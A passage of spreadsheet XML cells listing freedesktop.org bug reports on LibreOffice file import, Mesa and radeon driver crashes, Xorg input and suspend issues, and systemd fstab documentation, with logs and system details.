https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_4432/fi-skl-iommu/igt@drv_selftest@live_coherency.html</t>
  </si>
  <si>
    <t>LIBREOFFICE-49645</t>
  </si>
  <si>
    <t>FILEOPEN particular MSWORD2008 .docx: misinterprets letters from Symbol font</t>
  </si>
  <si>
    <t>This bug is similar to bug 39670 - FILEOPEN Writer mis-displays greek letters in symbol font importing docx. The sample document for this bug (https://bugs.freedesktop.org/attachment.cgi?id=49722) contains two Greek letters (lowercase alpha and beta) taken from the standard 'Symbol' font. If I try to open this document with different LibreOffice versions I get the following results:
* LibreOffice 3.4.6 on WinXP:
correct Greek alpha and beta letters visible both taken from the 'Symbol' font.
* LibreOffice 3.5.3 on WinXP:
wrong two ornaments visible in place of the Greek letters. Also the font association is wrong: if you select any of the both letters the font menu still shows the main text font (Cambria) instead of switching to 'Symbol'. It makes no difference if the 'Cambria' + 'Cambria Math' fonts are installed locally on the machine or not.
* LibreOffice 3.4.4 3.4.6 3.5.3.2 on MacOS X all show the same behaviour:
wrong two ornaments visible in place of the Greek letters. The font association is wrong just like with LibreOffice 3.5.3 on WinXP ('Cambria' instead of 'Symbol'). It makes no difference if the 'Cambria' + 'Cambria Math' fonts are installed locally on the machine or not.
If I compare this results with the bug report for bug 39670 I get the following impression (just correct me if I am wrong):
* On Windows bug 39670 was actually fixed at least since LibreOffice 3.4.2. Therefore this (the present) bug is a regression on Windows.
* On MacOS X I doubt that bug 39670 was fixed at all (nobody ever confirmed that bug 39670 has been really fixed in LibreOffice 3.4.x for MacOS).
* While there was some difference in handling these Greek letters taken from the 'Symbol' font between LibreOffice 3.4.x for Windows and 3.4.x for MacOS now both platforms show the same behaviour. This is an advantage of course.
Convinced by the results on MacOS X I first tried to re-open bug 39670. But Christopher M. Penalver gave his advise to open a new bug report instead. While his assumptions are not completely correct (this bug is a regression only on the Windows side not on the MacOS X side) it is right to open a new bug report because in LibreOffice 3.5.3 this bug is now a real cross-platform bug with equal results on Windows (at least Windows XP) and MacOS X. Could someone else please test on Linux and/or Windows 7? Thank you!
NB: There is a good chance that this bug does not only affect the Greek letters taken from the 'Symbol' font but also other glyphs from this font. This is why I propose Writer misinterprets letters from Symbol font in .docx file for the Summary field of this report not misinterprets Greek letters etc.
I will attach some screenshots showing the different results.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-29332</t>
  </si>
  <si>
    <t>Strange backtrace from the mailgateway</t>
  </si>
  <si>
    <t>Requesting show to change@freedesktop.org get me this reply:
Hello!
Your request to the mail gateway is malformed or an internal processing
error occured. The information below may help you or the gateway
administrator to identify the problem.
Error: A problem occured while trying to formulate the reply
==&gt; : expected a character buffer object
Python Stack Trace:
    /usr/bin/ud-mailgate:651: Reply = HandleChange(ReplyAttrs[0]Res[2])
   HandleChange /usr/bin/ud-mailgate:497: return Reply + TemplateSubst(Substopen(TemplatesDir+change-replyr).read())
   TemplateSubst /var/lib/python-support/python2.5/userdir_gpg.py:474: Template = Template.replace(x Map[x])
Please email admin@db.freedesktop.org if you have any questions.</t>
  </si>
  <si>
    <t>lu_zero</t>
  </si>
  <si>
    <t>XORG-17453</t>
  </si>
  <si>
    <t>Xvfb doesn't work at depth 32</t>
  </si>
  <si>
    <t>Reported by Tim Phipps  verified on 1.5.0:
The man page suggest ths as an example:
Xvfb :1 -screen 0 1600x1200x32
and it crashes with this error:
Fatal server error:
Couldn't add screen 0
Tracked down to miDoInitVisuals() returning FALSE because the loop over miVisuals ends with nvisual=0.</t>
  </si>
  <si>
    <t>LIBREOFFICE-35143</t>
  </si>
  <si>
    <t>pdf import adds and removes spaces in text</t>
  </si>
  <si>
    <t>Created attachment 44271
pdf before import
simple text is imported incorrectly.
blank spaces are added inside words and removed between words
example1 after import:
any informati on or t echnical data that is sensi tive material includi ng 
example 2 after import:
authorizedrepresentativesofallparties.ThisAgreementandperformancethereundershallbe
these are from the same document but different pages.
before and after documents are attached.</t>
  </si>
  <si>
    <t>matt.reischer</t>
  </si>
  <si>
    <t>MESA-23240</t>
  </si>
  <si>
    <t>Neverwinter Nights freezes X and nwmain consume 100% cpu and trace shows radeon to blame.</t>
  </si>
  <si>
    <t>While in game play in NWN the game will freeze and sound will stutter.  The
keyboard does not respond to any key presses (eg. ctrl+alt+backspace)
If I ssh in I still cannot kill nwmain or X.  They both run at 100% cpu (dual
core) and do not terminate on killall or kill -9.  (nwmain becomes a zombie but
it still consumes 100% cpu)
The crash occurs on Mesa 7.4 and 7.5 with 6.12.1 and 6.12.2 of the radeon drivers.  (I haven't tried other versions)
Reproducible: Always
Steps to Reproduce:
The bug occurs while playing Neverwinter Nights but not always in the same
place.  I've gotten between 15 minutes and 2 hours in before it crashes.
messages.log of the crash:
Jul 25 23:27:27 goodt60 Uhhuh. NMI received for unknown reason a1 on CPU 0.
Jul 25 23:27:27 goodt60 You have some hardware problem likely on the PCI bus.
Jul 25 23:27:27 goodt60 Dazed and confused but trying to continue
Jul 25 23:30:01 goodt60 cron[24468]: (root) CMD (test -x /usr/sbin/run-crons &amp;&amp;
/usr/sbin/run-crons )
Jul 25 23:31:27 goodt60 sshd[24479]: Accepted keyboard-interactive/pam for
stephen from 192.168.1.101 port 45568 ssh2
Jul 25 23:31:27 goodt60 sshd[24479]: pam_unix(sshd:session): session opened for
user stephen by (uid=0)
Jul 25 23:37:32 goodt60 sudo:  stephen : TTY=pts/0  PWD=/home/stephen 
USER=root  COMMAND=/usr/bin/killall X
Jul 25 23:37:32 goodt60 sudo: pam_unix(sudo:session): session opened for user
root by stephen(uid=0)
Jul 25 23:37:32 goodt60 sudo: pam_unix(sudo:session): session closed for user
root
Jul 25 23:39:46 goodt60 su[24559]: Successful su for root by stephen
Jul 25 23:39:46 goodt60 su[24559]: + pts/0 stephen:root
Jul 25 23:39:46 goodt60 su[24559]: pam_unix(su:session): session opened for
user root by stephen(uid=1000)
Jul 25 23:40:02 goodt60 cron[24565]: (root) CMD (test -x /usr/sbin/run-crons &amp;&amp;
/usr/sbin/run-crons )
Jul 25 23:40:04 goodt60 mtrr: MTRR 2 not used
Jul 25 23:40:05 goodt60 BUG: unable to handle kernel NULL pointer dereference
at 00000001
Jul 25 23:40:05 goodt60 IP: [] radeon_do_cp_idle+0x199/0x1f0 [radeon]
Jul 25 23:40:05 goodt60 *pde = 00000000 
Jul 25 23:40:05 goodt60 Oops: 0000 [#1] SMP 
Jul 25 23:40:05 goodt60 last sysfs file:
/sys/class/power_supply/BAT0/energy_full
Jul 25 23:40:05 goodt60 Modules linked in: radeon usbhid usb_storage ehci_hcd
uhci_hcd iwl3945 usbcore sg joydev
Jul 25 23:40:05 goodt60 
Jul 25 23:40:05 goodt60 Pid: 24364 comm: nwmain Not tainted (2.6.29-gentoo-r5
#1) 20077KU
Jul 25 23:40:05 goodt60 EIP: 0060:[] EFLAGS: 00010202 CPU: 0
Jul 25 23:40:05 goodt60 EIP is at radeon_do_cp_idle+0x199/0x1f0 [radeon]
Jul 25 23:40:05 goodt60 EAX: 00000001 EBX: f649dc00 ECX: 0003ffff EDX: 00027130
Jul 25 23:40:05 goodt60 ESI: f649c400 EDI: f649c400 EBP: f5cc7d08 ESP: f5cc7cf0
Jul 25 23:40:05 goodt60 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068
Jul 25 23:40:05 goodt60 Process nwmain (pid: 24364 ti=f5cc6000 task=f20bf660
task.ti=f5cc6000)
Jul 25 23:40:05 goodt60 Stack:
Jul 25 23:40:05 goodt60 00000282 f5caebe0 f649c4bc f649dc00 f649c400 f649dc00
f5cc7d28 f8180d36
Jul 25 23:40:05 goodt60 c0363ea1 f5caebe0 f5caebf4 f649c410 f649c400 f649c400
f5cc7d30 f818cf18
Jul 25 23:40:05 goodt60 f5cc7d54 c035ece9 f20a3ac0 00000286 00000008 00000282
f649c410 f6118af8
Jul 25 23:40:05 goodt60 Call Trace:
Jul 25 23:40:05 goodt60 [] ? radeon_do_release+0xc6/0x130 [radeon]
Jul 25 23:40:05 goodt60 [] ? drm_master_destroy+0x101/0x120
Jul 25 23:40:05 goodt60 [] ? radeon_driver_lastclose+0x8/0x10
[radeon]
Jul 25 23:40:05 goodt60 [] ? drm_lastclose+0x29/0x2c0
Jul 25 23:40:05 goodt60 [] ? drm_release+0x354/0x4f0
Jul 25 23:40:05 goodt60 [] ? __fput+0xb2/0x1b0
Jul 25 23:40:05 goodt60 [] ? fput+0x1f/0x30
Jul 25 23:40:05 goodt60 [] ? filp_close+0x47/0x70
Jul 25 23:40:05 goodt60 [] ? put_files_struct+0xa0/0xc0
Jul 25 23:40:05 goodt60 [] ? exit_files+0x41/0x50
Jul 25 23:40:05 goodt60 [] ? do_exit+0x5cf/0x760
Jul 25 23:40:05 goodt60 [] ? dequeue_task_fair+0x3b/0x1d0
Jul 25 23:40:05 goodt60 [] ? recalc_sigpending+0xe/0x40
Jul 25 23:40:05 goodt60 [] ? dequeue_signal+0x2b/0x1a0
Jul 25 23:40:05 goodt60 [] ? lapic_next_event+0x13/0x20
Jul 25 23:40:05 goodt60 [] ? do_group_exit+0x33/0xa0
Jul 25 23:40:05 goodt60 [] ? get_signal_to_deliver+0x166/0x370
Jul 25 23:40:05 goodt60 [] ? do_notify_resume+0x99/0x8b0
Jul 25 23:40:05 goodt60 [] ? getnstimeofday+0x53/0x120
Jul 25 23:40:05 goodt60 [] ? copy_to_user+0x36/0x130
Jul 25 23:40:05 goodt60 [] ? hrtimer_nanosleep+0x12b/0x170
Jul 25 23:40:05 goodt60 [] ? hrtimer_wakeup+0x0/0x20
Jul 25 23:40:05 goodt60 [] ? sys_nanosleep+0x60/0x70
Jul 25 23:40:05 goodt60 [] ? work_notifysig+0x13/0x19
Jul 25 23:40:05 goodt60 Code: 82 03 00 00 00 40 21 c8 e9 47 ff ff ff 90 8d 74
26 00 8b 83 e4 00 00 00 8b 40 10 8b 00 e9 ae fe ff ff 8b 83 e4 00 00 00 8b 40
10  00 e9 6b ff ff ff c7 44 24 04 d2 5a 19 f8 c7 04 24 71 67 19 
Jul 25 23:40:05 goodt60 EIP: [] radeon_do_cp_idle+0x199/0x1f0
[radeon] SS:ESP 0068:f5cc7cf0
Jul 25 23:40:05 goodt60 ---[ end trace 102836e0b42b5cbd ]---
Jul 25 23:40:05 goodt60 Fixing recursive fault but reboot is needed!
Jul 25 23:40:05 goodt60 kdm[8052]: X server for display :0 terminated
unexpectedly
Jul 25 23:40:05 goodt60 su[9287]: pam_unix(su:session): session closed for user
root
Jul 25 23:40:05 goodt60 su[23811]: pam_unix(su:session): session closed for
user root
Jul 25 23:40:05 goodt60 kdm: :0[8159]: pam_unix(kde:session): session closed
for user stephen
Jul 25 23:40:05 goodt60 acpid: client 8105[0:0] has disconnected
Jul 25 23:40:05 goodt60 acpid: client connected from 24579[0:0]
Jul 25 23:40:05 goodt60 acpid: 1 client rule loaded
Jul 25 23:40:20 goodt60 kdm[8052]: X server startup timeout terminating
Jul 25 23:40:35 goodt60 kdm[8052]: X server termination timeout killing
Jul 25 23:40:46 goodt60 kdm[8052]: X server is stuck in D state leaving it
alone
Jul 25 23:40:46 goodt60 kdm[8052]: X server for display :0 cannot be started
session disabled</t>
  </si>
  <si>
    <t>cycoone</t>
  </si>
  <si>
    <t>LIBREOFFICE-74287</t>
  </si>
  <si>
    <t>No color selectable for scatter chart points if there is no line</t>
  </si>
  <si>
    <t>Problem description: 
When creating a scatter chart where only symbols are present (i.e. no line conecting them) series color remains deactivated thus it's not possible to change the series color
Steps to reproduce:
1. Create a symbol-only scatter chart
2. Select one of the series of the chart and try to format it
3. Try to change at least one of the series color
Current behavior:
Color option is deactivated making formatting impossible. 
Expected behavior:
Color should be electable as before 4.2 
Workaround:
Select any different line style from none (continuous dotted etc.) which activates series color option.
OS:
Kubuntu 12.04 x86_64</t>
  </si>
  <si>
    <t>franciscoadriansanchez</t>
  </si>
  <si>
    <t>MESA-6814</t>
  </si>
  <si>
    <t>regression since rotation support added</t>
  </si>
  <si>
    <t>The i915 driver seems to have had a major speed regression since rotation
Using Xorg 7.0 and Mesa 3D just before rotation support gets 1110 FPS.
With the latest driver and Mesa just after rotation support I only 780FPS.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-9618</t>
  </si>
  <si>
    <t>defines directories in configure</t>
  </si>
  <si>
    <t>mimedir is defined and AC_SUBSTed in configure instead of being defined in the
Makefile.am. See the autoconf manual for why this breaks.</t>
  </si>
  <si>
    <t>MESA-23452</t>
  </si>
  <si>
    <t>[softpipe] glean pixelFormats fails</t>
  </si>
  <si>
    <t>mesa: (master) ef98eed0a94f3b76399b19f9f65ca6977cd11b5d
% glean -r results -t pixelFormats
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SRGB_ALPHA_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SRGB8_ALPHA8_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SRGB_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SRGB8_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0xff 0xff 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SLUMINANCE_ALPHA_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0xff 0xff 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SLUMINANCE8_ALPHA8_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0xff 0xff 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SLUMINANCE_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0xff 0xff 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_UNSIGNED_BYTE
  Internal Format: GL_SLUMINANCE8_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_BYTE
  Internal Format: GL_SRGB_ALPHA_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_BYTE
  Internal Format: GL_SRGB8_ALPHA8_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_BYTE
  Internal Format: GL_SRGB_EXT
  EnvMode: GL_REPLACE
pixelFormats failed at pixel (00) color channel 0:
  Expected: 0xff 0x00 0x00 0x00
  Found:    0x00 0x00 0x00 0x00
  Format: GL_RGBA
  Type: GL_BYTE
  Internal Format: GL_SRGB8_EXT
  EnvMode: GL_REPLACE
...</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-25038</t>
  </si>
  <si>
    <t>cgit is stale</t>
  </si>
  <si>
    <t>The front page of http://cgit.freedesktop.org/ has not been updated since 2009-11-03 07:10:30 (GMT) (over a week ago). Perhaps a cron job is stuck?</t>
  </si>
  <si>
    <t>pharris</t>
  </si>
  <si>
    <t>MESA-69081</t>
  </si>
  <si>
    <t>[radeonsi] Incorrect rendering of textures</t>
  </si>
  <si>
    <t>First of all thank you very much for the effort applied on the radeonsi driver. It's getting a nice shape quite quickly.
I have noticed some problems with the rendering on some games such as Killing Floor (KF) and Crusader Kings II (CK II).
The problem consists in that certain textures appear as black. This is not related to a dxtn problem but rather it seems to be related to the way the (global? in the case of CK II) illumination of the scene is applied. I have made this conclusion based on the fact that although on CK II all the terrain textures show a black colour (check the screenshots attached below one of them with radeonsi the other one with fglrx) on KF sometimes a texture is shown correct but a few steps ahead it is shown black. This usually happens when there is something blocking a source of illumination (check the two screenshots attached below where one is taken like just one step ahead or behind of the other screenshot both with radeonsi).
I believe the bugs on both games are the same or at least related and thus I am only opening a bug report.
My PC specs are as follows (taken from steam's system info):
InformaciÃ³n sobre el procesador:
    Fabricante:  AuthenticAMD
    CPU Family:  0x15
    CPU Model:  0x1
    CPU Stepping:  0x2
    CPU Type:  0x0
    Velocidad: 3600 Mhz
    Procesadores lÃ³gicos 8
    Procesadores fÃ­sicos 8
    HyperThreading:  No compatible
    FCMOV:  Compatible
    SSE2:  Compatible
    SSE3:  Compatible
    SSSE3:  Compatible
    SSE4a:  Compatible
    SSE41:  Compatible
    SSE42:  Compatible
InformaciÃ³n sobre la red:
    Velocidad de la red:  
VersiÃ³n del sistema operativo:
    Ubuntu 13.04 (64 bits)
    Nombre de kernel: Linux
    VersiÃ³n de kernel: 3.11.0-031100-generic
    Editor de X Server: The X.Org Foundation
    VersiÃ³n de X Server: 11303000
    Gestor X Window: KWin
    VersiÃ³n del runtime de Steam: steam-runtime-release_2013-09-05
Tarjeta de vÃ­deo:
    Controlador:  X.Org Gallium 0.4 on AMD PITCAIRN
    VersiÃ³n de controlador: 2.1 Mesa 9.3.0-devel (git-505fad0 raring-oibaf-ppa)
    OpenGL Version: 2.1
    Densidad de color del escritorio: 24 bits por pÃ­xel
    Frecuencia de actualizaciÃ³n del monitor: 60 Hz
    Identificador del fabricante: 0x1002
    Identificador del dispositivo: 0x6818
    NÃºmero de monitores: 1
    NÃºmero de tarjetas de vÃ­deo lÃ³gicas: 1
    ResoluciÃ³n de pantalla principal: 1920 x 1080
    ResoluciÃ³n de escritorio: 1920 x 1080
    TamaÃ±o de pantalla principal: 1878 x 1055  (2154 diag)
                                            477cm x 268cm  (547cm diag)
    No se ha detectado la memoria VRAM principal
Tarjeta de sonido:
    Dispositivo de sonido: Realtek ALC889
Memoria:
    RAM:  15993 Mb
Varios:
    Idioma de la IU:  EspaÃ±ol
    LANG:  es_ES.UTF-8
    MicrÃ³fono:  Not set
    Espacio total en disco disponible: 469324 MB
    Bloque libre mÃ¡s grande en el disco: 187784 MB
Software Instalado:
Informes de fallos recientes:
The GPU is a Radeon HD 7870. VRAM is 2 GB. Mesa's version is shown above (9.3 git 505fad0) plus llvm's version is 3.3-5ubuntu1~r~gd installed from oibaf's ppa.
I am also attaching the shader dumps from CK II and KF (in the map in which the screenshots were taken and having passed where the bug shows).
Please if any other information is needed just let me know.
Regards
JosÃ©</t>
  </si>
  <si>
    <t>j.suarez.agapito</t>
  </si>
  <si>
    <t>XORG-16596</t>
  </si>
  <si>
    <t>evdev no longer notices buttons 13 and 14 on MX1000 mouse</t>
  </si>
  <si>
    <t>Sometime recently (perhaps between evdev 1.2.0 and 1.99.2) evdev stopped picking up buttons 13 and 14 (left and right wheel tilt) on my Logitech MX1000 mouse.  All the rest of the buttons still work.
If I 'cat /dev/input/by-id/usb-Logitech_USB_RECEIVER-event-mouse' I do indeed get gibberish when tilting the wheel taking care not to move the mouse.  I take that as a sign that the kernel is seeing those events and relaying them to user space.  So the failure seems to be in the evdev Xorg module.
Here's my InputDevice section from xorg.conf:
Section InputDevice
        Identifier      Mouse
        Driver  evdev
        Option  Path /dev/input/by-id/usb-Logitech_USB_RECEIVER-event-mouse
        Option  Buttons 14
        Option  CorePointer
EndSection
I added the Buttons 14 in there just to see if that would work but it makes no difference.
Here are the relevant lines from my Xorg.0.log:
(**) Option CorePointer
(**) Mouse: always reports core events
(**) Mouse: Device: /dev/input/by-id/usb-Logitech_USB_RECEIVER-event-mouse
(II) Mouse: Found x and y relative axes
(II) Mouse: Found mouse buttons
(II) Mouse: Configuring as mouse
(II) evaluating device (Mouse)
(II) XINPUT: Adding extended input device Mouse (type: MOUSE)
(**) Logitech USB RECEIVER: always reports core events
(**) Logitech USB RECEIVER: Device: /dev/input/event2
(EE) Grab failed. Device already configured?
(II) UnloadModule: evdev
(EE) PreInit returned NULL for Logitech USB RECEIVER
It looks like the server is configuring the mouse correctly but then the XInput auto-detection is finding it and trying to set it up again which fails since it's already been claimed.
When I run xev I can produce ButtonPress and ButtonRelease events for buttons 1 (left) 2 (middle) 3 (right) 4 (scroll up) 5 (scroll down) 8 (back) 9 (forward) 10 (thumb 3) 11 (page up) and 12 (page down).  However I get no response from xev for buttons 13 (tilt left) and 14 (tilt right).  These used to work.
I don't know enough about the cause of the problem to know whether this is a duplicate of bug 9262 but if so the problem has resurfaced since that bug was closed.
If it helps I'm on Gentoo using the following ebuilds:
  x11-base/xorg-server-1.4.2
  x11-drivers/xf86-input-evdev-1.99.2-r2
$ uname -a
Linux Crushinator 2.6.25-gentoo-r6 #1 SMP Thu Jul 3 06:23:03 EDT 2008 x86_64 Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz GenuineIntel GNU/Linux</t>
  </si>
  <si>
    <t>POPPLER-4507</t>
  </si>
  <si>
    <t>function round does not exists in Solaris 8</t>
  </si>
  <si>
    <t>version 0.4.2 is not compiling under Solaris 8 due to the call of round
function in file CairoOutputDev.cc.
This round function does not seem to exist under Solaris8 as far as I know.
Laurent.</t>
  </si>
  <si>
    <t>laurent.besson</t>
  </si>
  <si>
    <t>TELEPATHY-30065</t>
  </si>
  <si>
    <t>Port Gabble to undrafted ContactSearch</t>
  </si>
  <si>
    <t>Hello.
I did this.
I started to port search-channel.c to use Wocky directly for general sanity while I was there but then I lost the will to live. I might continue later.</t>
  </si>
  <si>
    <t>MESA-50857</t>
  </si>
  <si>
    <t>Invalid command stream with CAICOS when ColorTiling2D enabled</t>
  </si>
  <si>
    <t>This might also be a bug in Linux kernel or radeon_drv.so.
Just upgraded my 64 bit HD6450 machine to Fedora 17 and gnome-shell fails immediately (login screen). Disabling ColorTiling2D in xorg.conf fixes it. ColorTiling2D worked OK - or did nothing - in Fedora 16 with radeon_drv.so from git and 3.3.7 kernel.
dmesg log and lspci output are attached.</t>
  </si>
  <si>
    <t>SYSTEMD-89048</t>
  </si>
  <si>
    <t>DOC: the man pages should clarify that systemctl daemon-reload is the way to make systemd reread /etc/fstab</t>
  </si>
  <si>
    <t>Hi
http://www.freedesktop.org/software/systemd/man/systemd.mount.html#fstab reads that:
Mount units may either be configured via unit files or via /etc/fstab (see fstab(5) for details). Mounts listed in /etc/fstab will be converted into native units dynamically at boot and when the configuration of the system manager is reloaded. In general configuring mount points through /etc/fstab is the preferred approach. See systemd-fstab-generator(8) for details about the conversion.
Once the user modifies the /etc/fstab it is difficult to find out how to regenerate the units. Usual advice given by many is to reload the configuration systemctl daemon-reload which does not do the trick.
Running /usr/lib/systemd/system-generators/systemd-fstab-generator does not change existing units (systemctl list-units --all) either.
Someone on Arch Linux forum adviced that /usr/lib/systemd/system-generators/systemd-fstab-generator /run/systemd/generator '' '' should work.
Not obvious from the man pages of systemd-fstab-generator which mentions something in Examples but without any reference to the actual location.
systemd-fstab-generator converts /etc/fstab into native mount units. It uses argv[1] as location to place the generated unit files in order to allow the user to override fstab with his own native unit files but also to ensure that /etc/fstab overrides any vendor default from /usr.
Looking at it from today's perspective it may seem clear - just read and understand a buch of man pages. But without knowing the actual command argument syntax I guess I would have to stay with the easy-to-carry-out reboots of the computer. The old style was simply mount -a written directly in the man page.
How about an equivalent for systemd-fstab-generator which would simply carry out the default task which is done during boot?</t>
  </si>
  <si>
    <t>archont</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-35640</t>
  </si>
  <si>
    <t>xkeyboard-config does not check for dependencies</t>
  </si>
  <si>
    <t>Created attachment 44794
0001-configure-enable-run-time-dependencies-as-build-time.patch
See some history in Bug 35530. The gist is:
From the patch:
    configure: enable run-time-dependencies as build-time dependencies
    With the recent addition of Sinhala keysyms xkeyboard-config has a run-time
    dependency on certain xproto/libX11 versions. The build will work anyway
    but using those layouts may result in unusable keyboards.
    Enable these run-time dependencies as build-time dependencies so that those
    building on their local machines are warned that the resulting build may not
    work. Those building on build hosts (e.g. distros) can skip this check with
    --disable-runtime-deps.</t>
  </si>
  <si>
    <t>MESA-17967</t>
  </si>
  <si>
    <t>more glxgears window freezes system (with default vblank_mode=1)</t>
  </si>
  <si>
    <t>Created attachment 19479
xorg.0.log
Platform: Montevina Mccreary
OS:    SLES_11_beta2
Packages: 2008Q3RC2 2008Q3RC3
Mesa-7.2+GEM
xf86-video-intel-2.5 branch
Reproduce steps:
Initiate several glxgears windowns (5 or more) and then maxsize one of more switch them and wait you will find the OS and X crashed. not any response.
Or you can move one of glxgears window quickly the problem is the same.
Since this case is easily reproduced I don't upload xorg.conf.</t>
  </si>
  <si>
    <t>quanxian.wang</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-5885</t>
  </si>
  <si>
    <t>REMOVE: wiki.inkscape.org from apache</t>
  </si>
  <si>
    <t>Yes I moved the Inkscape wiki back over to sf.net. Please remove the support
for it in the httpd.conf file for apache.
Please do not remove however support for planet.inkscape.org as that is still
needed. Thanks!</t>
  </si>
  <si>
    <t>XORG-18049</t>
  </si>
  <si>
    <t>[945GM DRI2] S3 resume fails on eeepc/X200s</t>
  </si>
  <si>
    <t>Hardware platform : eeePC
Code 
===========================================================
git://anongit.freedesktop.org:/git/xorg/proto/dri2proto (master branch)
git://anongit.freedesktop.org:/git/mesa/drm (master)
git://anongit.freedesktop.org:/git/mesa/mesa (master)
git://anongit.freedesktop.org:/git/xorg/xserver (master with dri2 enabled)
git://anongit.freedesktop.org:/git/xorg/driver/xf86-video-intel (dri2 branch)
Reproduce Steps(stepscurrent result reproduce possibility)
===========================================================
(1) boot system
(2) launch terminal
(3) run command echo mem &gt; /sys/power/state to suspend the system
(4) push power button the resume the system
Expected result:
===========================================================
System could resume back successfully
Current result:
===========================================================
System will either fail to resume back or will resume back but hang.</t>
  </si>
  <si>
    <t>LIBREOFFICE-35067</t>
  </si>
  <si>
    <t>EasyHack: fix language fallback mechanism of untranslated list items</t>
  </si>
  <si>
    <t>See https://bugs.freedesktop.org/show_bug.cgi?id=33189#c9
and https://bugs.freedesktop.org/show_bug.cgi?id=33189#c14</t>
  </si>
  <si>
    <t>DEJAVU-9563</t>
  </si>
  <si>
    <t>The hook in 01AF (Capital U with horn) is lower than expected in Sans Condensed</t>
  </si>
  <si>
    <t>The hook should be higher like in DejaVu Sans and Sans Light. This is wrong for
all inherited Vietnamese glyphs as well so fixing this glyph should fix them all.</t>
  </si>
  <si>
    <t>pclouds</t>
  </si>
  <si>
    <t>LIBREOFFICE-81972</t>
  </si>
  <si>
    <t>Writing more than 63335 consecutive characters with no blank spaces hangs LibO</t>
  </si>
  <si>
    <t>Created attachment 103756
screencast
Hello
So I decided to test the support for monster paragraphs thing.
I downloaded the original test file on Apache Bugzilla[1] and decided to type few characters more.
Expected behaviour: 
-Being able to continue typing
Actual behaviour: 
-LibreOffice hangs. 
Reproducible with latest master OS X 7.5. I didn't install 4.3 so I cannot try with 4.2.6. 
[1]https://issues.apache.org/ooo/show_bug.cgi?id=17171
-Video screencast attached.</t>
  </si>
  <si>
    <t>XORG-35267</t>
  </si>
  <si>
    <t>nouveau fails to load BIOS on EFI boot.</t>
  </si>
  <si>
    <t>Created attachment 44410
full dmesg output
I try use nouveau on my gentoo. As this is a MacBook i installed Grub2 and boot directly in EFI mode (eg no BIOS simulation.... i think).
At loading the nouveau driver it fails due to no valid BIOS found.
The relevant error message is (dmesg output attached):nouveau 0000:01:00.0: enabling device (0002 -&gt; 0003)
nouveau 0000:01:00.0: PCI INT A -&gt; GSI 16 (level low) -&gt; IRQ 16
nouveau 0000:01:00.0: setting latency timer to 64
[drm] nouveau 0000:01:00.0: Detected an NV50 generation card (0x084700a2)
checking generic (80060000 960000) vs hw (80000000 10000000)
fb: conflicting fb hw usage nouveaufb vs EFI VGA - removing generic driver
Console: switching to colour dummy device 80x25
[drm] nouveau 0000:01:00.0: Attempting to load BIOS image from PRAMIN
[drm] nouveau 0000:01:00.0: ... BIOS signature not found
[drm] nouveau 0000:01:00.0: Attempting to load BIOS image from PROM
[drm] nouveau 0000:01:00.0: ... BIOS signature not found
[drm] nouveau 0000:01:00.0: Attempting to load BIOS image from PCIROM
nouveau 0000:01:00.0: Invalid ROM contents
[drm] nouveau 0000:01:00.0: ... BIOS signature not found
[drm] nouveau 0000:01:00.0: Attempting to load BIOS image from ACPI
[drm] nouveau 0000:01:00.0: ... BIOS signature not found
[drm] nouveau 0000:01:00.0: No valid BIOS image found
nouveau 0000:01:00.0: PCI INT A disabled
From this point I do not get any graphical output anymore (but i can ssh into the host). (On a side note: can i somehow tell the kernel to switch back to efifb?)
I tried this with the gentoo-sources (36-rc5 kernel) with the git-sources (38-rc2 and rc3 kernel) always getting the same problem in dmesg.
I too tried use nouveau as a module or compiled into the kernel no difference.
I tried tell grub to use fakebios but it did not worked (or I did somethng wrong im not that familiar with grub/efi/bios)</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-91531</t>
  </si>
